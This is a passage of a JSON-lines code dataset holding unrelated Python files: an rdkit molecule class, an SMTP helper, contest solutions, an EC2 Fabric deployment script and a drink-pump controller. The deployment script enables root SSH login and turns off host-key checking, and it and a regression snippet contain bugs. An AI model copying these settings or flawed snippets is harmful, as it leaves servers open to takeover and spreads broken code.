-------\n :class:`rdkit.Mol`\n The ``rdkit`` molecule with the centroid placed at\n `position`. This is the same instance as that in\n :attr:`Molecule.mol`.\n\n \"\"\"\n\n conf_id = self.mol.GetConformer(conformer).GetId()\n\n # Get the original centroid.\n centroid = self.centroid(conf_id)\n # Find out how much it needs to shift to reach `position`.\n shift = position - centroid\n # Apply the shift and get the resulting rdkit conformer object.\n new_conf = self.shift(shift, conf_id).GetConformer()\n new_conf.SetId(conf_id)\n\n # Replace the old rkdit conformer with one where the centroid\n # is at `position`.\n self.mol.RemoveConformer(conf_id)\n self.mol.AddConformer(new_conf)\n\n return self.mol\n\n def set_position_from_matrix(self, pos_mat, conformer=-1):\n \"\"\"\n Set atomic positions of the molecule to those in `pos_mat`.\n\n Parameters\n ----------\n pos_mat : :class:`numpy.ndarray`\n The matrix holds the coordinates on which the atoms of the\n molecule should be placed.\n\n The shape of the matrix is ``[3, n]``. Each column of\n `pos_mat` represents the coordinates of a single atom. 
The\n 1st column sets the coordinates of the atom with id of 0.\n The next column sets the coordinates of the atom with id 1,\n and so on.\n\n conformer : :class:`int`, optional\n The id of the conformer to be used.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n conf = self.mol.GetConformer(conformer)\n for i, coord_mat in enumerate(pos_mat.T):\n coord = rdkit_geo.Point3D(coord_mat.item(0),\n coord_mat.item(1),\n coord_mat.item(2))\n conf.SetAtomPosition(i, coord)\n\n def shift(self, shift, conformer=-1):\n \"\"\"\n Shifts the coordinates of all atoms.\n\n This does not modify the molecule. A modified copy is returned.\n\n Parameters\n ----------\n shift : :class:`numpy.ndarray`\n A numpy array holding the value of the shift along each\n axis.\n\n conformer : :class:`int`, optional\n The id of the conformer to use.\n\n Returns\n -------\n :class:`rdkit.Mol`\n A copy of the molecule where the coordinates have been\n shifted by `shift`.\n\n \"\"\"\n\n # The function does not modify the existing conformer, as a\n # result a new instance is created and used for modification.\n conf = rdkit.Conformer(self.mol.GetConformer(conformer))\n\n # For each atom, get the atomic positions from the conformer\n # and shift them. Create a new geometry instance from these new\n # coordinate values. The geometry instance is used by rdkit to\n # store the coordinates of atoms. Finally, set the conformers\n # atomic position to the values stored in this newly generated\n # geometry instance.\n for atom in self.mol.GetAtoms():\n\n # Remember the id of the atom you are currently using. It\n # is used to change the position of the correct atom at the\n # end of the loop.\n atom_id = atom.GetIdx()\n\n # `atom_position` in an instance holding in the x, y and z\n # coordinates of an atom in its 'x', 'y' and 'z'\n # attributes.\n atom_position = np.array(conf.GetAtomPosition(atom_id))\n\n # Inducing the shift.\n new_atom_position = atom_position + shift\n\n # Creating a new geometry instance.\n new_coords = rdkit_geo.Point3D(*new_atom_position)\n\n # Changes the position of the atom in the conformer to the\n # values stored in the new geometry instance.\n conf.SetAtomPosition(atom_id, new_coords)\n\n # Create a new copy of the rdkit molecule instance representing\n # the molecule - the original instance is not to be modified.\n new_mol = rdkit.Mol(self.mol)\n\n # The new rdkit molecule was copied from the one held in the\n # `mol` attribute, as result it has a copy of its conformer. To\n # prevent the rdkit molecule from holding multiple conformers\n # the `RemoveAllConformers` method is run first. 
The shifted\n # conformer is then given to the rdkit molecule, which is\n # returned.\n new_mol.RemoveAllConformers()\n new_mol.AddConformer(conf)\n return new_mol\n\n def update_cache(self):\n \"\"\"\n Update attributes of cached molecule.\n\n Using ``multiprocessing`` returns modified copies of molecules.\n In order to ensure that the cached molecules have\n their attributes updated to the values of the copies, this\n method must be run on the copies.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n if self.key in self.__class__.cache:\n self.__class__.cache[self.key].__dict__ = dict(vars(self))\n\n def update_from_mae(self, path, conformer=-1):\n \"\"\"\n Updates molecular structure to match an ``.mae`` file.\n\n Parameters\n ----------\n path : :class:`str`\n The full path of the ``.mae`` file from which the structure\n should be updated.\n\n conformer : :class:`int`, optional\n The conformer to be updated.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n if conformer == -1:\n conformer = self.mol.GetConformer(conformer).GetId()\n\n mol = mol_from_mae_file(path)\n conf = rdkit.Conformer(mol.GetConformer())\n conf.SetId(conformer)\n self.mol.RemoveConformer(conformer)\n self.mol.AddConformer(conf)\n\n def update_from_mol(self, path, conformer=-1):\n \"\"\"\n Updates molecular structure to match an ``.mol`` file.\n\n Parameters\n ----------\n path : :class:`str`\n The full path of the ``.mol`` file from which the structure\n should be updated.\n\n conformer : :class:`int`, optional\n The conformer to be updated.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n if conformer == -1:\n conformer = self.mol.GetConformer(conformer).GetId()\n\n mol = remake(rdkit.MolFromMolFile(molFileName=path,\n sanitize=False,\n removeHs=False))\n conf = rdkit.Conformer(mol.GetConformer())\n conf.SetId(conformer)\n self.mol.RemoveConformer(conformer)\n self.mol.AddConformer(conf)\n\n def update_stereochemistry(self, conformer=-1):\n \"\"\"\n Updates stereochemistry tags in :attr:`Molecule.mol`.\n\n Parameters\n ----------\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n for atom in self.mol.GetAtoms():\n atom.UpdatePropertyCache()\n rdkit.AssignAtomChiralTagsFromStructure(self.mol, conformer)\n rdkit.AssignStereochemistry(self.mol, True, True, True)\n\n def write(self, path, conformer=-1):\n \"\"\"\n Writes a molecular structure file of the molecule.\n\n This bypasses the need to the writining functions in ``rdkit``.\n These have issues with macromolecules due to poor ring finding\n and sanitization issues.\n\n Parameters\n ----------\n path : :class:`str`\n The `path` to which the molecule should be written.\n\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n write_funcs = {\n '.mol': self._write_mdl_mol_file,\n '.sdf': self._write_mdl_mol_file,\n '.pdb': self._write_pdb_file,\n '.xyz': self._write_xyz_file\n }\n\n _, ext = os.path.splitext(path)\n write_func = write_funcs[ext]\n write_func(path, conformer)\n\n def _write_mdl_mol_file(self, path, conformer=-1):\n \"\"\"\n Writes a V3000 ``.mol`` file of the molecule\n\n This function should not be used directly, only via\n :meth:`write`.\n\n Parameters\n ----------\n path : :class:`str`\n The full path to the file being written.\n\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n with 
open(path, 'w') as f:\n f.write(self.mdl_mol_block(conformer))\n\n def _write_pdb_file(self, path, conformer=-1):\n \"\"\"\n Writes a ``.pdb`` file of the molecule\n\n This function should not be used directly, only via\n :meth:`write`.\n\n Parameters\n ----------\n path : :class:`str`\n The full path to the file being written.\n\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n # First write the file using rdkit.\n rdkit.MolToPDBFile(self.mol, path, conformer)\n\n # Edit the file because rkdit does poor atom labelling.\n new_content = ''\n with open(path, 'r') as pdb:\n for line in pdb:\n if 'HETATM' in line:\n words = line.split()\n lbl_word = words[2]\n rpl_word = words[-1]\n rpl_word += \" \"*(len(lbl_word)-len(rpl_word))\n line = line.replace(lbl_word, rpl_word)\n\n new_content += line\n\n with open(path, 'w') as pdb:\n pdb.write(new_content)\n\n def _write_xyz_file(self, path, conformer=-1):\n \"\"\"\n Writes a ``.xyz`` file of the molecule\n\n This function should not be used directly, only via\n :meth:`write`.\n\n Parameters\n ----------\n path : :class:`str`\n The full path to the file being written.\n\n conformer : :class:`int`, optional\n The conformer to use.\n\n Returns\n -------\n None : :class:`NoneType`\n\n \"\"\"\n\n if conformer == -1:\n conformer = self.mol.GetConformer(conformer).GetId()\n\n x, y, z = self.position_matrix(conformer)\n number_atoms = str(len(x))\n\n with open(path, \"w\") as xyz:\n xyz.write(number_atoms)\n xyz.write(\"\\n\")\n xyz.write(\"\\n\")\n for i in range(len(x)):\n xyz.write('{} {:f} {:f} {:f}\\n'.format(\n self.atom_symbol(i), x[i], y[i], z[i]\n ))\n","sub_path":"stk/molecular/molecules/molecule.py","file_name":"molecule.py","file_ext":"py","file_size_in_byte":34091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
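The `rotate` method in the molecule record above uses a translate-rotate-translate pattern around the molecular centroid, delegating the matrix itself to a `rotation_matrix_arbitrary_axis` helper that is not shown in this record. A minimal plain-`numpy` sketch of that pattern, assuming the standard Rodrigues formula for the axis rotation:

```python
import numpy as np

def rotation_matrix_arbitrary_axis(theta, axis):
    # Rodrigues' formula: R = I + sin(t)*K + (1 - cos(t))*K^2, where K
    # is the cross-product matrix of the normalized rotation axis.
    axis = np.asarray(axis, dtype=float)
    axis = axis / np.linalg.norm(axis)
    k = np.array([[0, -axis[2], axis[1]],
                  [axis[2], 0, -axis[0]],
                  [-axis[1], axis[0], 0]])
    return np.eye(3) + np.sin(theta)*k + (1 - np.cos(theta))*(k @ k)

def rotate_about_centroid(pos_mat, theta, axis):
    # pos_mat has shape [3, n], one column per atom, matching the
    # convention of position_matrix() in the class above.
    centroid = pos_mat.mean(axis=1, keepdims=True)
    rot = rotation_matrix_arbitrary_axis(theta, axis)
    # Shift the centroid to the origin, rotate, then shift back, so the
    # rotation happens about the molecule rather than the global origin.
    return rot @ (pos_mat - centroid) + centroid

# Three collinear points rotated 90 degrees about the z axis.
points = np.array([[0., 1., 2.],
                   [0., 0., 0.],
                   [0., 0., 0.]])
print(rotate_about_centroid(points, np.pi / 2, [0, 0, 1]))
```

Translating the centroid to the origin first is what makes the rotation happen "about the molecule"; applying the matrix directly would also swing the molecule around the global origin.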
+{"seq_id":"320186320","text":"from email.mime.multipart import MIMEMultipart\nfrom email.mime.image import MIMEImage\nfrom email.mime.text import MIMEText\nimport smtplib\n\nfrom copernicus_tools.settings import *\n\n\nclass MailHandler:\n def __init__(self):\n self.user = ''\n self.password = ''\n self.msg = MIMEMultipart()\n self.text = MIMEText('')\n self.file_to_attach_path = ''\n self.image = None\n\n def send_admin_mail(self,\n mail_subject='',\n mail_text='',\n mail_from=admin_mail_from,\n mail_to=admin_mail_to,\n image_to_attach_path=None):\n self.msg = MIMEMultipart()\n self.msg['Subject'] = str(mail_subject)\n self.msg['From'] = str(mail_from)\n self.msg['To'] = str(mail_to)\n self.text = MIMEText(str(mail_text))\n self.msg.attach(self.text)\n self.user = email_user\n self.password = email_password\n\n if image_to_attach_path:\n try:\n f = open(image_to_attach_path, 'rb')\n self.image = MIMEImage(f.read())\n f.close()\n self.msg.attach(self.image)\n except IOError as e:\n logging.info(\n 'Could not send Admin Mail '\n '(From: {}, To: {}, Attached Image (if any): {}). '\n 'IOError: {}'.format(\n self.msg['From'], self.msg['To'],\n image_to_attach_path, str(e)))\n return\n\n try:\n smtp = smtplib.SMTP_SSL(email_host + ':' + email_port)\n smtp.login(self.user, self.password)\n smtp.sendmail(mail_from, mail_to, self.msg.as_string())\n smtp.quit()\n logging.debug(\n 'Admin Mail sent. '\n 'From: {}, To: {}, Attached Image (if any): {}'.format(\n self.msg['From'], self.msg['To'], image_to_attach_path))\n except smtplib.SMTPException as e:\n logging.info(\n 'Could not send Admin Mail '\n '(From: {}, To: {}, Attached Image (if any): {}). '\n 'SMTPException: {}'.format(\n self.msg['From'], self.msg['To'], image_to_attach_path,\n str(e)))\n return\n\n def send_product_selected_mail(self, factory_product_instance):\n self.send_admin_mail(\n mail_subject='Product selected for download',\n mail_text='The following product has '\n 'been selected for download:\\n\\n' +\n factory_product_instance.title + '\\n' +\n factory_product_instance.summary\n )\n\n def send_product_downloaded_mail(self, factory_product_instance):\n self.send_admin_mail(\n mail_subject='Product downloaded',\n mail_text='The following product has '\n 'been downloaded:\\n\\n' +\n factory_product_instance.title + '\\n' +\n factory_product_instance.summary\n )\n\n def send_product_processed_mail(self, factory_product_instance):\n self.send_admin_mail(\n mail_subject='Product processed to Level 2A',\n mail_text='The following product has '\n 'been processed to Level 2A:\\n\\n' +\n factory_product_instance.title + '\\n' +\n factory_product_instance.summary\n )\n\n def send_preview_generated_mail(self, lab_product_instance):\n self.send_admin_mail(\n mail_subject='Preview generated',\n mail_text='Preview image generated for:\\n\\n' +\n lab_product_instance.title,\n image_to_attach_path=lab_product_instance.preview_image_path\n )\n","sub_path":"copernicus_tools/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"128533366","text":"\nfrom math import ceil\nn,h=[int(i)for i in input().split()]\nab=[[int(i) for i in input().split()] for j in range(n)]\nans=0\n\n\na=[ab[i][0] for i in range(n)]\nb=[ab[i][1] for i in range(n)]\na.sort()\nb.sort()\nwhile h>0 and len(b)>0 and b[-1]>a[-1]:\n\th-=b[-1]\n\tb.pop(-1)\n\tans+=1\nif h>0:\n\tans+=int(ceil(h/a[-1]))\nprint(ans)\n","sub_path":"atcoder/abc/080/abc085d.py","file_name":"abc085d.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"449552122","text":"import pandas as pd\nfrom sklearn.linear_model import LinearRegression\n \ndf = pd.read_csv(r'F:\\Coursera courses\\IBM cognitive class\\Data Analysis with Python\\sampledata.csv')\nlm = LinearRegression()\ny = df[['horsepower', 'curb-weight', 'engine-size', 'highway-mpg']]\nx = df['price']\n\nlm.fit(y,x)\npred = lm.predict(x)\nprint(pred[0:5])\nprint(\"Intercept \" , lm.intercept_)\nprint(\"Slop \" , lm.coef_)","sub_path":"Model Development/MultipleRegression.py","file_name":"MultipleRegression.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"169021847","text":"wrapping_paper = 0\r\nribbon = 0\r\nwith open(\"input2.txt\", \"r\") as textfile:\r\n\tfor line in textfile:\r\n\t\tnew_line = \"\"\r\n\t\tfor letter in line:\r\n\t\t\tif letter == 'x':\r\n\t\t\t\tnew_line += \" \"\r\n\t\t\telse:\r\n\t\t\t\tnew_line += letter\r\n\t\tl = int(new_line[:2])\r\n\t\tw = int(new_line[2:-3])\r\n\t\th = int(new_line[-3:])\r\n\t\twrapping_paper += 2 * l * w + 2 * w * h + 2 * l * h + min(l * w, w * h, h * l)\r\n\t\tribbon += 2 * min(l + w, l + h, w + h) + w * h * l\r\n\r\nprint(\"Answer for 2A:\", wrapping_paper)\r\nprint(\"Answer for 2B:\", ribbon)","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"333090","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport os\nimport sys\nimport boto.exception\nimport boto.ec2\nimport datetime\nimport time\nimport subprocess\n\nfrom fabric.api import (\n env,\n settings,\n sudo,\n prefix,\n put,\n cd,\n run,\n)\n\nfrom fabric.tasks import execute\n\nfrom fabric.contrib.files import (\n comment,\n uncomment,\n exists,\n append,\n sed\n)\n\nimport logging\n\nfrom copy_deploy_repo import copy_deploy_repo\n#based on https://github.com/ContinuumIO/wakari-deploy/blob/master/ami_creation/fabfile.py\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.DEBUG)\n# formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\n\n# log.addHandler(handler)\nlog.addHandler(console)\n\n# ami-65ce000e\n# ami-849e0c84\n# ami-1998e77c\n# ami-af5591eb\n# ami-9f92edfa\n# ami-1d4b1f78\n#AMI_ID = 'ami-1d4b1f78' #SSD in us-east-1\n#AMI_ID = 'ami-dfcab0b5' #SSD in us-east-1\n#AMI_ID = 'ami-dfcab0b5' #SSD in us-east-1\nAMI_ID = 'ami-6c276206' #SSD in us-east-1\n\nuse_latest_key = 'True' == os.environ.get('USE_LATEST_KEY', False)\n\nif 'xxx' == os.environ.get('AWS_ID', 'xxx').lower():\n print(\"you must pass a value for the environment variable AWS_ID\")\n quit()\nif 'xxx' == os.environ.get('AWS_SECRET', 'xxx').lower():\n print(\"you must pass a value for the environment variable AWS_SECRET\")\n quit()\nif 'xxx' == os.environ.get('PUF_FILE_PATH', 'xxx').lower():\n print(\"you must pass a value for the environment variable PUF_FILE_PATH\")\n quit()\nif 'xxx' == os.environ.get('SERVER_FILE_PATH', 'xxx').lower():\n print(\"you must pass a value for the environment variable SERVER_FILE_PATH\")\n quit()\n\nelse:\n PUF_FILE_PATH = os.path.abspath(os.path.expanduser(os.environ.get('PUF_FILE_PATH')))\n SERVER_FILE_PATH = os.path.abspath(os.path.expanduser(os.environ.get('SERVER_FILE_PATH')))\n if not os.path.exists(PUF_FILE_PATH):\n print(\"{} does not exist\".format(PUF_FILE_PATH))\n quit()\n\nenv.use_ssh_config = True\nenv.disable_known_hosts = True\nenv.connection_attempts = True\nenv.timeout = 300\n\nKEYNAME = \"{}-aei-dropq-{}\".format(AMI_ID,os.environ.get('USER', 'ospc'))\n#KEYNAME = \"keypair-ospc\"\n#SECURITY_GROUP = 'launch-wizard-26'\n#SECURITY_GROUP = 'dropq-security-group'\nSECURITY_GROUP = 'dropq-iam-group'\n\ndef create_box():\n old_ids = set(i.id for i in ec2.get_only_instances())\n machine = ec2.run_instances(AMI_ID, key_name=KEYNAME, min_count=2, max_count=2,\n security_groups=[SECURITY_GROUP,], instance_type=os.environ.get('EC2_INSTANCE_TYPE', 'm3.medium'))\n new_instances = [i for i in ec2.get_only_instances() if i.id not in old_ids]\n for new_instance in new_instances:\n print(new_instance.id)\n ec2.create_tags([new_instance.id], {\"billingProject\": \"aei\"})\n\n\n is_running = [False] * len(new_instances)\n while not all(is_running):\n for count, newinstance in enumerate(new_instances):\n is_running[count] = new_instance.state == u'running'\n time.sleep(3)\n for new_instance in new_instances:\n new_instance.update()\n\n\n is_reachable = [False] * len(new_instances)\n while not all(is_reachable):\n instance_ids=[new_instance.id for new_instance in new_instances]\n inst_statuses = ec2.get_all_instance_status(instance_ids=instance_ids)\n is_reachable = [inst_status.system_status.details['reachability'] != 'passed' for 
inst_status in inst_statuses]\n time.sleep(3)\n\n time.sleep(1)\n for new_instance in new_instances:\n assert new_instance.public_dns_name\n print(new_instance.public_dns_name)\n\n return new_instances\n\n\ndef create_keypair(source=KEYNAME):\n\n try:\n kp = ec2.delete_key_pair(source)\n except (boto.exception.EC2ResponseError):\n pass\n\n kp = ec2.create_key_pair(source)\n filename = os.environ.get('EC2_KEY_PATH', './keys/ec2-{}.pem'.format(datetime.datetime.now().strftime('%Y-%m-%d_%H:%M')))\n latest_filename = os.environ.get('EC2_KEY_PATH', './latest.pem')\n kfile = open(filename, 'wb')\n latest_kfile = open(latest_filename, 'wb')\n def file_mode(user, group, other):\n return user*(8**2) + group*(8**1) + other*(8**0)\n kfile.write(kp.material)\n latest_kfile.write(kp.material)\n kfile.close()\n latest_kfile.close()\n os.chmod(filename, file_mode(7,0,0))\n os.chmod(latest_filename, file_mode(7,0,0))\n return filename\n\ndef test_all_ssh(instances, key_file):\n # needed to convert from unicode to ascii?\n key_file = str(key_file)\n ips = [str(instance.public_dns_name) for instance in instances]\n #env.host = 'ubuntu@e' + ip\n #env.host_string = ip\n #env.hosts = ['ubuntu@e' + ip for ip in ips]\n env.hosts = [ip for ip in ips]\n env.user = 'ubuntu'\n env.key_file = key_file\n env.key_filename = key_file\n\n print(env.hosts)\n\n # forward ssh agent -- equivalent of ssh -A\n env.forward_agent = True\n\n log.info('Key file: %s' % (key_file))\n log.debug('Trying to connect...')\n for h in env.hosts:\n env.host_string = h\n run('pwd')\n\ndef test_ssh2():\n run('pwd')\n\ndef test_ssh(instance, key_file):\n # needed to convert from unicode to ascii?\n key_file = str(key_file)\n ip = str(instance.public_dns_name)\n env.host = 'ubuntu@e' + ip\n env.host_string = ip\n env.hosts = [env.host]\n env.user = 'ubuntu'\n env.key_file = key_file\n env.key_filename = key_file\n\n # forward ssh agent -- equivalent of ssh -A\n env.forward_agent = True\n\n log.info('Key file: %s' % (key_file))\n log.debug('Trying to connect...')\n run('pwd')\n\ndef connect_to_existing_machine(ip, key_file_path):\n env.user = 'ubuntu'\n env.hosts = ['{}@{}'.format(env.user, ip)]\n env.host = '{}@{}'.format(env.user, ip)\n env.host_string = '{}@{}'.format(env.user, ip)\n env.key_file = key_file_path\n env.key_filename = key_file_path\n env.forward_agent = True\n log.info('Key file: %s' % (key_file_path))\n log.debug('Trying to connect...')\n run('pwd')\n\ndef fix_sshd_config():\n '''root needs an actual shell, so fix the sshd_config.'''\n config_file = '/etc/ssh/sshd_config'\n uncomment(config_file, r'^.*PermitRootLogin yes', use_sudo=True)\n comment(config_file, r'^PermitRootLogin forced-commands-only', use_sudo=True)\n\ndef apt_installs():\n log.info(\"installing packages with apt-get\")\n sudo(\"add-apt-repository -y ppa:saltstack/salt\")\n sudo(\"apt-get update -y\")\n packages = ['salt-master', 'salt-minion', 'salt-syndic', 'git', 'tig',\n 'silversearcher-ag', 'python-qt4']\n sudo(\"apt-get install -y {}\".format(' '.join(packages)))\n\n\ndef install_ogusa_repo():\n if 'XXX' not in os.environ.get('GITHUB_PRIVATE_KEY_PATH'):\n with settings(warn_only = True):\n run('ssh -T git@github.com -o StrictHostKeyChecking=no')\n url = 'git@github.com:open-source-economics/OG-USA'\n else:\n url = 'https://{USERNAME}@github.com/open-source-economics/OG-USA'.format(\n USERNAME = os.environ.get('GITHUB_USERNAME'))\n\n sudo('rm -rf ~/OG-USA')\n if os.environ.get('GIT_BRANCH'):\n run(\"git clone {} --branch {}\".format(url, 
os.environ.get('OGUSA_GIT_BRANCH')))\n else:\n run(\"git clone {}\".format(url))\n\n\n\ndef copy_puf_file():\n put(PUF_FILE_PATH, \"/home/ubuntu/deploy/puf.csv.gz\")\n put(SERVER_FILE_PATH, \"/home/ubuntu/reset_server.sh\")\n\ndef extract_puf_file():\n run(\"cd /home/ubuntu/deploy/; gunzip -k puf.csv.gz\")\n\ndef convenience_aliases():\n run('echo \"alias supervisorctl=\\'supervisorctl -c /home/ubuntu/deploy/fab/supervisord.conf\\'\" >> ~/.bashrc')\n run('echo \"alias ss=\\'sudo /usr/bin/salt-call state.highstate --retcode-passthrough --log-level=debug --config-dir=/home/ubuntu/deploy/fab/salt\\'\" >> ~/.bashrc')\n\n\ndef run_salt():\n run(\"ln -s ~/deploy/salt ~/salt\")\n sudo('sudo /usr/bin/salt-call state.highstate --retcode-passthrough --log-level=debug --config-dir=\"$HOME/deploy/salt\"')\n\ndef reset_server():\n run(\"source /home/ubuntu/reset_server.sh\")\n\n\nkey_filename = './latest.pem'\n#instances = ['ip1', 'ip2']\nkey_file = str(key_filename)\nips = instances\nenv.hosts = [ip for ip in ips]\nenv.user = 'ubuntu'\nenv.key_file = key_file\nenv.key_filename = key_file\n# forward ssh agent -- equivalent of ssh -A\nenv.forward_agent = True\n\nprint(env.hosts)\nprint(ips)\n#execute(test_ssh2)\n#execute(apt_installs)\n#execute(install_ogusa_repo)\n#execute(convenience_aliases)\n#execute(copy_puf_file)\n#execute(extract_puf_file)\nexecute(run_salt)\nexecute(reset_server)\n\nfor instance in instances:\n ssh_command = 'ssh -i {key} ubuntu@{ip} \"'.format(ip=instance, key=key_filename)\n with open(\"log_{}.log\".format(instance), 'w') as f:\n f.write(ssh_command)\n print(ssh_command)\n","sub_path":"deploy/fab/fab_exec.py","file_name":"fab_exec.py","file_ext":"py","file_size_in_byte":8910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"221093984","text":"#!/usr/bin/env python\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n# from __future__ import unicode_literals\n\nimport importlib\nimport pprint\n\nfrom onnx import defs\n\nfrom onnx_tf.common import (op_name_to_lower, ONNX_OP_TO_TF_OP,\n ONNX_OP_TO_TF_OP_STR)\n\n\ndef main():\n backend_opset_dict = {}\n frontend_opset_dict = {}\n frontend_tf_opset_dict = {}\n\n for schema in defs.get_all_schemas():\n op_name = schema.name\n backend_opset_dict[op_name] = []\n frontend_opset_dict[op_name] = []\n\n version = 1\n while True:\n try:\n backend = (importlib.import_module('backends.backend_v{}'.format(version))\n .TensorflowBackend)\n frontend = (importlib.import_module('frontends.frontend_v{}'\n .format(version)).TensorflowFrontend)\n except:\n break\n\n # Register all tf ops in ONNX_TO_HANDLER\n tf_op_names = []\n onnx_to_handler = frontend.ONNX_TO_HANDLER.get(\n 'frontend_v{}'.format(version), {})\n # for handler in frontend.ONNX_TO_HANDLER.values():\n for handler in onnx_to_handler.values():\n if isinstance(handler, list):\n tf_op_names.extend(list(map(op_name_to_lower, handler)))\n else:\n tf_op_names.append(op_name_to_lower(handler))\n\n for schema in defs.get_all_schemas():\n op_name = schema.name\n lower_op_name = op_name_to_lower(op_name)\n has_backend_handler = hasattr(backend, 'handle_' + lower_op_name)\n # Record only one version for trivial ops\n if has_backend_handler or (version == 1 and\n lower_op_name in ONNX_OP_TO_TF_OP.keys()):\n backend_opset_dict[op_name].append(version)\n\n # Register once if onnx op in ONNX_OP_TO_TF_OP_STR\n if version == 1 and schema.name in ONNX_OP_TO_TF_OP_STR and \\\n ONNX_OP_TO_TF_OP_STR[schema.name] not in tf_op_names:\n tf_op_names.append(op_name_to_lower(ONNX_OP_TO_TF_OP_STR[schema.name]))\n frontend_opset_dict[op_name].append(version)\n # Register if onnx op in ONNX_TO_HANDLER\n elif op_name in onnx_to_handler:\n frontend_opset_dict[op_name].append(version)\n for tf_op_name in tf_op_names:\n frontend_tf_opset_dict.setdefault(str(tf_op_name), []).append(version)\n\n version += 1\n\n with open('opset_version.py', 'w') as version_file:\n pp = pprint.PrettyPrinter(indent=4)\n version_file.write(\"backend_opset_version = {\\n \" +\n pp.pformat(backend_opset_dict)[1:-1] + \"\\n}\\n\\n\")\n version_file.write(\"frontend_opset_version = {\\n \" +\n pp.pformat(frontend_opset_dict)[1:-1] + \"\\n}\\n\\n\")\n version_file.write(\"frontend_tf_opset_version = {\\n \" +\n pp.pformat(frontend_tf_opset_dict)[1:-1] + \"\\n}\\n\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"onnx_tf/gen_opset.py","file_name":"gen_opset.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"422329641","text":"import os \nif os.environ['ENV'] == \"dev\":\n import pi.MockGpio as GPIO\nelse:\n import RPi.GPIO as GPIO\n\nimport time\nimport pi.IngredientService as IngredientService\nimport pi.MenuService as MenuService\n\n\n# get mapping of pump numbers to pins\npumpToPin = {\n 0:36\n ,1:22\n ,2:18\n ,3:11\n ,4:13\n ,5:15\n}\n\n# get the reverse mapping\npinToPump = {}\nfor pump,pin in pumpToPin.items():\n pinToPump[pin] = pump\n\n# initialize pins on board\nGPIO.setmode(GPIO.BOARD)\nfor pin in pinToPump:\n GPIO.setup(pin, GPIO.OUT, initial=GPIO.HIGH)\n\n\n# amount in ml\ndef pourFromPump(pumpNumber, amount):\n global pumpToPin\n if pumpNumber not in pumpToPin:\n print(\"tried to pour a liquid from a pump thats not in the pin map\")\n print(pumpNumber)\n print(type(pumpNumber))\n return\n\n pinNumber = pumpToPin[pumpNumber]\n duration = amount / IngredientService.pumpRate[pumpNumber]\n print(\"Pin ON %d\" % pinNumber)\n GPIO.output(pinNumber,False)\n time.sleep(duration)\n GPIO.output(pinNumber,True)\n print(\"Pin OFF %d\" % pinNumber)\n\n\n\ndef pourDrink(drinkGuid, menuFilePath=MenuService.defaultMenufilePath, ingredientfilePath=IngredientService.defaultIngredientfilePath, pumMapfilePath=IngredientService.defaultPumpMapfilePath):\n if not MenuService.isValidDrinkToPour(drinkGuid, menuFilePath=menuFilePath, ingredientfilePath=ingredientfilePath, pumMapfilePath=pumMapfilePath):\n print(\"Skipping drink to pour due to invalid drink enty\")\n return\n\n menu = MenuService.getMenu()\n drink = menu[drinkGuid]\n pumpMap = IngredientService.getPumpMap()\n\n for ing,amount in drink[\"ings\"].items():\n pumpNum = pumpMap[ing]\n pourFromPump(pumpNum, amount)\n\n","sub_path":"pi/PouringService.py","file_name":"PouringService.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148864189","text":"from platform import python_version\nfrom os.path import expanduser\n\nname = \"likide\"\nversion = \"0.0.3\"\npy_version = python_version()\nauthor = \"BIPBIPGaminG & Tudiiii\"\nlang = \"fr_FR\"\nfont_size = \"20\"\nfont_family = \"Segoe\\ UI\\ Light\"\ndir_var = {'DISK': \"C\", 'USER_HOME': expanduser(\"~\")}\ncurrent_project_dir = '{USER_HOME}\\\\Documents\\\\Likide\\\\FirstProject\\\\'.format(**dir_var)\ncurrent_file_name = \"../main.py\"\n\n\nbackground_color = \"#4f4f4f\"\nforeground_color = \"#eaeaea\"\n","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
